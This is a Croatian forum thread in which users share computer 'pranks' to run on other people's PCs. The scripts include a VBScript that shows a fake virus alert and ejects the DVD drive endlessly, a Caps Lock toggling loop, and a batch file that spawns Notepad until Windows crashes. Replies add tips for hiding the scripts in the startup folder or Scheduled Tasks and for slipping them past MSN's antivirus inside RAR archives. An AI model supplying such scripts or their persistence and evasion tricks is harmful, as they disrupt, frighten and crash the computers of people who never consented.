Vaši prankovi (šale) i hackovi

poruka: 1.070
|
čitano: 249.234
|
moderatori: DrNasty, pirat, Lazarus Long, XXX-Man, vincimus
+/- sve poruke
ravni prikaz
starije poruke gore
15 godina
neaktivan
offline
Vaši prankovi(šale) i hackovi

Kad bi bilo nešto tako na hrvatskom...ali i ovo je ok

ja za frenda stavio da je bio sa 2 sestre blizanke...

Asrcok 775 Dual Vsta Pentium D Dual Core 3,4 Ghz @ 3,83 Ghz 2 Gb RAM ATI Radeon X1700 FSC
15 godina
neaktivan
offline
RE: Vaši prankovi(šale) i hackovi
4ucker kaže...
Bellatrix kaže...
dogman kaže...
Bellatrix kaže...

Evo još jedan prank. Prestrašite nekoga s BSOD-om. Ovo je nešto kao screensaver. Napravite prečac i promjenite mu ikonu i kad žrtva klikne na prečac show goes on!Smijeh

Za izlazak treba samo pritisnuti esc

http://technet.microsoft.com/en-us/sysinternals/bb897558.aspx skinite odavde taj prank

 Meni avira 09 javlja da je to vvirus.........evo drugu sam smjestio foru sa otvaranjem dvd.....hehehCool...........tema je dobra
Meni NOD32 ništa ne javlja.
A luda je šala, čovjek bi stvarno pomislio, evo ga nešto nevalja! hahaCool
 Yep, ni meni NOD32 nish ne javlja da je viruzzz, jer NOD32 RUllzzzzz, a Avira Suckz...
 Evo vam dokaz...kada kliknem da skinem onaj file ovo mi se pojavi,upozorenje da je virus
15 godina
neaktivan
offline
RE: Vaši prankovi(šale) i hackovi
dogman kaže...
4ucker kaže...
 Evo vam dokaz...kada kliknem da skinem onaj file ovo mi se pojavi,upozorenje da je virus
 Pošalji na Virustotal pa onda daj screenshot.
Uzalud je čitati, ako ništa ne naučiš ništa iz tog što si pročitao... http://www.kozul.comuv.com/forum/
Poruka je uređivana zadnji put sri 15.4.2009 21:51 (Bellatrix).
15 godina
offline
RE: Vaši prankovi(šale) i hackovi
dogman kaže...
4ucker kaže...
Bellatrix kaže...
dogman kaže...
Bellatrix kaže...

Evo još jedan prank. Prestrašite nekoga s BSOD-om. Ovo je nešto kao screensaver. Napravite prečac i promjenite mu ikonu i kad žrtva klikne na prečac show goes on!Smijeh

Za izlazak treba samo pritisnuti esc

http://technet.microsoft.com/en-us/sysinternals/bb897558.aspx skinite odavde taj prank

 Meni avira 09 javlja da je to vvirus.........evo drugu sam smjestio foru sa otvaranjem dvd.....hehehCool...........tema je dobra
Meni NOD32 ništa ne javlja.
A luda je šala, čovjek bi stvarno pomislio, evo ga nešto nevalja! hahaCool
 Yep, ni meni NOD32 nish ne javlja da je viruzzz, jer NOD32 RUllzzzzz, a Avira Suckz...
 Evo vam dokaz...kada kliknem da skinem onaj file ovo mi se pojavi,upozorenje da je virus
 Tu pise "Virus ili "UNWANTED" znaci nezeljeni program tako da ne mora da znaci da je virus nego znaci da je to program od kojeg nemas koristi...
EP45-DS4 Core 2 Quad Q6600 GeForce GTX 260 Corsair TWIN 2x2 GB 500.GB Seagate Disk
15 godina
offline
RE: Vaši prankovi(šale) i hackovi
livadasb kaže...

momci pitanje, ideja je pala vezana uz post sa gta4

 

može ovo:

 

ispiše tekst sa opcijama yes i no, primjerice ako klikne yes uđe u igru, ako no, pokrene onaj BSOD što ima za skinut

 

dobra gore fora s luxxom, ali mogao si i neku bolju vijest odabrat, ja sam za frenda stavio da je uhvaćen mrtav pijan u beogradu

 A kak se to narihta?
Kažu da škola nije zatvor, a mi ni krivi ni dužni dobili 12 godina. Einstein je umro, Newton je umro, Tesla je umro, a ni ja se ne osjećam baš najbolje! |^^^^^^^^^^^^^^^^^^^^^^^| || |...NOOB TRUCK..........| ||'|";,__ |_..._..._______===|=||_|__|..., ] "(@)'(@)"""''"**|(@)(@)*****''(@)
15 godina
neaktivan
offline
RE: Vaši prankovi(šale) i hackovi

Neznam da je ko spominjo ali evo:

WindowsXP=msgbox("Your computer is infected by some  dangerous virus and it's going to destroy your DVD-ROM. Click YES to continue, or NO to watch the boring dialog box ",20,"Warrning")

 


Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
do
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
loop
End If

 

 

To prepisite u notepad i spremite kao vbs

 

 

Ah sorry videl sam sad da ima istih.

METALLICA
Poruka je uređivana zadnji put sri 15.4.2009 23:14 (uljez).
15 godina
offline
RE: Vaši prankovi(šale) i hackovi

Ovo kaj napravim na srpskoj stranici,to svi vide ili samo ja?

Kažu da škola nije zatvor, a mi ni krivi ni dužni dobili 12 godina. Einstein je umro, Newton je umro, Tesla je umro, a ni ja se ne osjećam baš najbolje! |^^^^^^^^^^^^^^^^^^^^^^^| || |...NOOB TRUCK..........| ||'|";,__ |_..._..._______===|=||_|__|..., ] "(@)'(@)"""''"**|(@)(@)*****''(@)
15 godina
offline
RE: Vaši prankovi(šale) i hackovi
dogman kaže...
 Evo vam dokaz...kada kliknem da skinem onaj file ovo mi se pojavi,upozorenje da je virus
 Vidiš ti kaj piše na kraju upozorenja: Joke????
Avira ti u opcijama ima i tu mogućnost,da reagira čak i na takve aplikacije,što je po meni fenomenalno.
Zato Avira nije sucks kako netko reče....samo je temeljita u zadaćama koje su joj namjena.

BTW,sad sam ga i sam downloadao i Norton 360 mi ništa nije javio.Cool
http://s2.ba.bitefight.org/c.php?uid=94118
Poruka je uređivana zadnji put sri 15.4.2009 23:31 (fromcelltohell).
15 godina
neaktivan
offline
RE: Vaši prankovi(šale) i hackovi

Samo da znate ako saljete ove fore na neciji msn nece uspjeti...jer window live ima izgleda ugradjen antivirus pa ce prepoznat .vbs datoteke i nece dopustit da zrtva otvori

15 godina
protjeran
offline
RE: Vaši prankovi(šale) i hackovi
livadasb kaže...

momci pitanje, ideja je pala vezana uz post sa gta4

 

može ovo:

 

ispiše tekst sa opcijama yes i no, primjerice ako klikne yes uđe u igru, ako no, pokrene onaj BSOD što ima za skinut

 

 

 nisam dobio odgovor, ili nitko ne zna ili nitko nije pročitao
15 godina
neaktivan
offline
RE: Vaši prankovi(šale) i hackovi

joj meni radi otvaranje i zatvaranje dvd čitača (ali nakon pet puta nemože više otvoriti)

 

15 godina
offline
RE: Vaši prankovi(šale) i hackovi

Ljudi,a ono kaj se vijest napiše na srpskoj stranici,to samo aj vidim ili svi?

Kažu da škola nije zatvor, a mi ni krivi ni dužni dobili 12 godina. Einstein je umro, Newton je umro, Tesla je umro, a ni ja se ne osjećam baš najbolje! |^^^^^^^^^^^^^^^^^^^^^^^| || |...NOOB TRUCK..........| ||'|";,__ |_..._..._______===|=||_|__|..., ] "(@)'(@)"""''"**|(@)(@)*****''(@)
15 godina
neaktivan
offline
RE: Vaši prankovi(šale) i hackovi

To vide svi oni kojima daš link da vide to. O Bože dragi...

Bustin at people who said my name in vain, I got no time for them tricks, I'm heavy in the game!!! I wanna be a baller, please, But the bitches and the liquor keep on callin me... I'm floatin free on the highway, formulatin plans...
15 godina
neaktivan
offline
RE: Vaši prankovi(šale) i hackovi
fromcelltohell kaže...
dogman kaže...
 Evo vam dokaz...kada kliknem da skinem onaj file ovo mi se pojavi,upozorenje da je virus
 Vidiš ti kaj piše na kraju upozorenja: Joke????
Avira ti u opcijama ima i tu mogućnost,da reagira čak i na takve aplikacije,što je po meni fenomenalno.
Zato Avira nije sucks kako netko reče....samo je temeljita u zadaćama koje su joj namjena.

BTW,sad sam ga i sam downloadao i Norton 360 mi ništa nije javio.Cool
 prepoznao je da je to ŠALA?? e baš sam razmišljo da skinem aviru i ovo je bilo potvrda.
jel avira besplatna? pretpostavljam da ne. da ju skinem sa one stranice di je na naslovnici piratski brodić?Smijeh
[url=http://profile.xfire.com/tonko14][img]http://miniprofile.xfire.com/bg/sh/type/0/tonko14.png[/img][/url]
15 godina
neaktivan
offline
RE: Vaši prankovi(šale) i hackovi
Bellatrix kaže...
4ucker kaže...

A zna li itko kako napraviti da ako pokrenes onaj file AAAA da svejedno ako se pritisne ili yes ili no da se pocne otvarati DVD-rom tj napraviti petlju...

WindowsXP=msgbox("Your computer is infected by some fu**ing dangerous virus and it's going to destroy your DVD-ROM. Click YES to continue, or NO to watch the boring dialogue box",20,"Warrning")


Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
do
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
loop

End If

 

____________________

 

ovo radi

 

lol svejedno klikneš li na YES ili NO!

nečitak ----------------------- Da se Facebook server sruši 90% mladih palo bi u tešku depresiju. Ako si u onih 10% koji bi im se smijali stavi ovo u sign.
15 godina
neaktivan
offline
Vaši prankovi(šale) i hackovi

Ma Avira je OK, a prijavljuje kao virus jer oduzima kontrolu nad kompom (dok traje Fake BSOD)...

online armor ti je najobičniji screensaver označavao kao keylogger, što je u stvari i točno, on zabilježava pritisak tipke ili pomak miša da bi se izgasio...

Asrcok 775 Dual Vsta Pentium D Dual Core 3,4 Ghz @ 3,83 Ghz 2 Gb RAM ATI Radeon X1700 FSC
15 godina
neaktivan
offline
Vaši prankovi(šale) i hackovi

Imate i program "Windows Error Message Creator" (pogodite za što služi) :

DOWNLOAD

Asrcok 775 Dual Vsta Pentium D Dual Core 3,4 Ghz @ 3,83 Ghz 2 Gb RAM ATI Radeon X1700 FSC
15 godina
neaktivan
offline
Vaši prankovi(šale) i hackovi

Evo još dvije zanimljive skripte od mene:

 

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop

 

spremite kao .vbs ovo stalno pali gasi Caps Lock tako da žrtva nemože normalno pisati.. heheheSmijeh

 

a ovu skriptu:

 

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

 

spremite kao .bat konstantno otvara notepad i zaledi komp dok se ne sruše windowsi. Možete staviti nekome ako ste ljuti na njega!Viče heheSmijeh

 

Of course sve radite na svoju vlastitu odgovornost.

Uzalud je čitati, ako ništa ne naučiš ništa iz tog što si pročitao... http://www.kozul.comuv.com/forum/
15 godina
neaktivan
offline
RE: Vaši prankovi(šale) i hackovi
Bellatrix kaže...

Evo još dvije zanimljive skripte od mene:

 

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop

 

spremite kao .vbs ovo stalno pali gasi Caps Lock tako da žrtva nemože normalno pisati.. heheheSmijeh

 

a ovu skriptu:

 

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

 

spremite kao .bat konstantno otvara notepad i zaledi komp dok se ne sruše windowsi. Možete staviti nekome ako ste ljuti na njega!Viče heheSmijeh

 

Of course sve radite na svoju vlastitu odgovornost.

 tako jednostavna skripta a tako pogubna...bravo za tebeSmijeh
Bolje biti 100 godina bogataš nego 7 dana siromah º°¨ ¸„ø¤º°¨„ø¤º°¨°º¤ø„¸¨°º¤ø„¸¸„ º¤ø„¸ ¨°º¤ø„ ¸APOCALYPTICA º¤ø„¸ ¸„ø¤º°¨¸„ø¤º „¸¨°º¤ø„¸¸„ ¸„ø¤º „¸¨°
15 godina
protjeran
offline
RE: Vaši prankovi(šale) i hackovi

dali netko zna, kako dodjeliti određenu funkciju tipkama yes i no?

15 godina
protjeran
offline
Vaši prankovi(šale) i hackovi

Kako staviti lazno upozorenje o virusu na neku datoteku????

15 godina
offline
RE: Vaši prankovi(šale) i hackovi
dogman kaže...

Samo da znate ako saljete ove fore na neciji msn nece uspjeti...jer window live ima izgleda ugradjen antivirus pa ce prepoznat .vbs datoteke i nece dopustit da zrtva otvori

 E pa gospodine dogman spremis u .RAR i eto...blllllll
EP45-DS4 Core 2 Quad Q6600 GeForce GTX 260 Corsair TWIN 2x2 GB 500.GB Seagate Disk
15 godina
neaktivan
offline
RE: Vaši prankovi(šale) i hackovi
SPAWNK4MPER ti mama kaže...
 prepoznao je da je to ŠALA?? e baš sam razmišljo da skinem aviru i ovo je bilo potvrda.
jel avira besplatna? pretpostavljam da ne. da ju skinem sa one stranice di je na naslovnici piratski brodić?Smijeh
 NIKAD NEMOJ SKIDATI PIRATSKE ANTIVIRUSE! Ja sam to jednom napravio i opako požalio... Ugl ima ti i izdanje koje se plaća, a ima i besplatno, ja koristim besplatno i predobro mi radi, imam super zaštitu od virusa, a nema potrebe za piratstvom :D

Bellatrix kaže...

Evo još dvije zanimljive skripte od mene:

 

(...)

 Haha dobre su, još staviš da se iskopira u startup folder :D
15 godina
protjeran
offline
RE: Vaši prankovi(šale) i hackovi
Proz0r kaže...
SPAWNK4MPER ti mama kaže...
 prepoznao je da je to ŠALA?? e baš sam razmišljo da skinem aviru i ovo je bilo potvrda.
jel avira besplatna? pretpostavljam da ne. da ju skinem sa one stranice di je na naslovnici piratski brodić?Smijeh
 NIKAD NEMOJ SKIDATI PIRATSKE ANTIVIRUSE! Ja sam to jednom napravio i opako požalio... Ugl ima ti i izdanje koje se plaća, a ima i besplatno, ja koristim besplatno i predobro mi radi, imam super zaštitu od virusa, a nema potrebe za piratstvom :D

Bellatrix kaže...

Evo još dvije zanimljive skripte od mene:

 

(...)

 Haha dobre su, još staviš da se iskopira u startup folder :D
 

ili još bolje, staviti u Scheduled Tasks i da se pokreće u određeno vrijeme, tako da je teže skužiti

16 godina
neaktivan
offline
Vaši prankovi(šale) i hackovi

strava XD

EP45-DS3R,Q9550,HD4870x2, T240HD, WD 500, SB640, 4GBPlatinum XTC, DC kit, 700W OCZ
15 godina
neaktivan
offline
RE: Vaši prankovi(šale) i hackovi
Bellatrix kaže...

Evo još dvije zanimljive skripte od mene:

 

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop

 

spremite kao .vbs ovo stalno pali gasi Caps Lock tako da žrtva nemože normalno pisati.. heheheSmijeh

 

a ovu skriptu:

 

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

 

spremite kao .bat konstantno otvara notepad i zaledi komp dok se ne sruše windowsi. Možete staviti nekome ako ste ljuti na njega!Viče heheSmijeh

 

Of course sve radite na svoju vlastitu odgovornost.

 predobre su skripte....
Asrcok 775 Dual Vsta Pentium D Dual Core 3,4 Ghz @ 3,83 Ghz 2 Gb RAM ATI Radeon X1700 FSC
15 godina
neaktivan
offline
Vaši prankovi(šale) i hackovi
Asrcok 775 Dual Vsta Pentium D Dual Core 3,4 Ghz @ 3,83 Ghz 2 Gb RAM ATI Radeon X1700 FSC
15 godina
neaktivan
offline
RE: Vaši prankovi(šale) i hackovi
Proz0r kaže...
SPAWNK4MPER ti mama kaže...
 prepoznao je da je to ŠALA?? e baš sam razmišljo da skinem aviru i ovo je bilo potvrda.
jel avira besplatna? pretpostavljam da ne. da ju skinem sa one stranice di je na naslovnici piratski brodić?Smijeh
 NIKAD NEMOJ SKIDATI PIRATSKE ANTIVIRUSE! Ja sam to jednom napravio i opako požalio... Ugl ima ti i izdanje koje se plaća, a ima i besplatno, ja koristim besplatno i predobro mi radi, imam super zaštitu od virusa, a nema potrebe za piratstvom :D

 Slažem se ...to se i meni dogodilo ...a kad ti otkaže anti virus nema što ne gine...
Bolje biti 100 godina bogataš nego 7 dana siromah º°¨ ¸„ø¤º°¨„ø¤º°¨°º¤ø„¸¨°º¤ø„¸¸„ º¤ø„¸ ¨°º¤ø„ ¸APOCALYPTICA º¤ø„¸ ¸„ø¤º°¨¸„ø¤º „¸¨°º¤ø„¸¸„ ¸„ø¤º „¸¨° ☻/ /▌ Metallica / \
15 godina
neaktivan
offline
RE: Vaši prankovi(šale) i hackovi
livadasb kaže...

dali netko zna, kako dodjeliti određenu funkciju tipkama yes i no?

 Misliš ovako nešto!

a = MsgBox("Vaše računalo je zaraženo opasnim virusom, Klikni DA ako želiš da Windows formatira disk C: i ukloni virus, ili klikni NE ako želiš da imaš zoološki vrt u računalu",20 , "Upozorenje")
if a = vbYes then
f= MsgBox("Jesi siguran u to što činiš", 74, " Pazi ovdje")
b = MsgBox("Izabrao si DA, odlično, pri sljedećem startupu windows će formatirati disk C:",46 , "Pažnja")
e= MsgBox("Svaka čast na Hrabrosti", 72 , "SuperMan")
else
c = MsgBox("Izabrao si NE, ubrzo očekuj zoološki vrt u svom PC-u",46 , "Pažnja")
d= MsgBox("Žao mi je", 72 , "OK")
End If
hehehe Cool
Uzalud je čitati, ako ništa ne naučiš ništa iz tog što si pročitao... http://www.kozul.comuv.com/forum/
15 godina
neaktivan
offline
RE: Vaši prankovi(šale) i hackovi
Bellatrix kaže...
livadasb kaže...

dali netko zna, kako dodjeliti određenu funkciju tipkama yes i no?

 Misliš ovako nešto!

a = MsgBox("Vaše računalo je zaraženo opasnim virusom, Klikni DA ako želiš da Windows formatira disk C: i ukloni virus, ili klikni NE ako želiš da imaš zoološki vrt u računalu",20 , "Upozorenje")
if a = vbYes then
f= MsgBox("Jesi siguran u to što činiš", 74, " Pazi ovdje")
b = MsgBox("Izabrao si DA, odlično, pri sljedećem startupu windows će formatirati disk C:",46 , "Pažnja")
e= MsgBox("Svaka čast na Hrabrosti", 72 , "SuperMan")
else
c = MsgBox("Izabrao si NE, ubrzo očekuj zoološki vrt u svom PC-u",46 , "Pažnja")
d= MsgBox("Žao mi je", 72 , "OK")
End If
hehehe Cool
 super fora....ona stranica iznad koju sam stavio je zakon....toliko prankova....ahaha
Asrcok 775 Dual Vsta Pentium D Dual Core 3,4 Ghz @ 3,83 Ghz 2 Gb RAM ATI Radeon X1700 FSC
Nova poruka
E-mail:
Lozinka:
 
vrh stranice